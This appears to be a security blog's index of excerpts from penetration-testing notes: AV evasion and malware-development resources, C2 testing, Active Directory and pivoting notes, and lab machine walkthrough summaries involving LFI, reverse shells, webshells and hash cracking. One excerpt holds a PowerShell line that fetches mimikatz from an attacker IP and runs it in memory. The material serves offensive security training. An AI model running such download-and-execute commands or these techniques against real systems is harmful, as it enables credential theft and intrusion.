When doing an engagement sometimes one would need to test a payload or an attack vector before deploying it. Watching how an operating system logs different events or how security solutions detect certain payloads can be valuable information for a red teamer/penetration tester. An example that happened was gained credentials to MSSQL, and the MSSQL…
Work in Progress Courses SEKTOR7 Institute https://maldevacademy.com/ EvasionEDR By Matt Hand Sources URL Description Category https://github.com/NUL0x4C/HellShell HellShell GitHub repository Penetration Testing https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/#weapon Exploit writing tutorial on Corelan.be Exploit Development https://www.corelan.be/ Corelan.be website Cybersecurity https://github.com/Krypteria/AtlasLdr AtlasLdr GitHub repository Malware Analysis https://labs.jumpsec.com/obfuscating-c2-during-a-red-team-engagement/ Article on obfuscating C2 during Red Team engagement Red Teaming https://github.com/matterpreter/DefenderCheck DefenderCheck GitHub repository Security…
OSEP/osep_checklistv2.md at main · In3x0rabl3/OSEP · GitHub Web Application: MSSQL: Privilege Escalation: Windows Linux Lateral Movement:
C# Basics Data Types C# provides a number of built-in data types, including integers, floating-point numbers, booleans, and characters. Here are some examples: In this code, we declare and initialize variables of type int, float, bool, and char. The int and float types are used for storing numerical values, while the bool type is used…
Source Good tools Malware forums/channels/discord Test payload against AV Defcon – Writing custom backdoor payloads with C# GitHub – mvelazc0/defcon27_csharp_workshop: Writing custom backdoor payloads with C# – Defcon 27 Workshop Step by Step for obfuscating code AV Evasion MindMap – From Start to finish (AV) Anti-Virus – The Hacker Recipes General AV Evasion cheatsheet Check…
Here are my notes from different courses I’m taking. Courses and resources https://www.udemy.com/course/learn-python-and-ethical-hacking-from-scratch/ https://tryhackme.com/room/pythonbasics https://tryhackme.com/room/pythonforcybersecurity Notes from ‘Learn Python & Ethical Hacking From Scratch‘ Lecture 1 – MAC Address Changer https://docs.python.org/3/library/subprocess.html Change MAC address using subprocess Script upgrade using variables Input from user Handling user input The above example is not a secure way as…
This is a list of Command and control (C2) servers that I’ve tested. Covenant Installation and setup From the Covenant GitHub, “Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform…
This is notes taken from the THM room ‘Wreath’, which is a great room for learning Active Directory and pivoting. https://www.tryhackme.com/room/wreath And from other sources. Summary What is pivoting? Pivoting is the art of using access obtained over one machine to exploit another machine deeper in the network. It is one of the most essential…
These are my notes from the Active Directory networks at TryHackMe, as well as notes from other sources. Inspo: Work in progress References Matrix Impacket – SecureAuth Name Explanation Tools/attack example Unconstrained delegation Constrained delegation Resource-based constrained delegation mimikatz.exe Dump hashes invoke-mimikatz ps1 version of mimikatz. To load into memory (New-Object System.Net.WebClient).DownloadString(‘http://192.168.119.120/mimikatz.txt’) | IEX and…
On this Windows machine there was a SMB share that had two VHDs that we could remotly mount. The VHDs looked like a backup of a Windows. Using secretsdump we could dump the hash from from the /system32/config, and get the hash for users. Using john the ripper, I cracked the hash for L4mpje. After…
There is no excerpt because this is a protected post.
On this Linux machine I abused LFI to find the password for admin panel for Tomcat. From there I used CLI to upload .WAR file to get a reverse shell. In /var/www there was a zip file which was password protected. Cracking the password using John, we find the credentials for the user Ash. From…
This Linux machine had a PHP page with LFI vulnerability. To upload a webshell I used SMB. From there we find credentials from a database config file. To root the machine I added a reverse shell to a writeable python module which was called upon by a python script run by root in cronjob. Enumeration…
On this Solaris machine we used finger to enumerate users. We then guessed the password for the enumerated user to get SSH access. From there we escalated our privilege to Sammy through a shadow file we had access to. I cracked the password and as able to SU to Sammy. Sammy was able to run…
Buffers are memory storage regions that temporarily hold data while it is being transferred from one location to another. A buffer overflow (or buffer overrun) occurs when the volume of data exceeds the storage capacity of the memory buffer. As a result, the program attempting to write the data to the buffer overwrites adjacent memory…
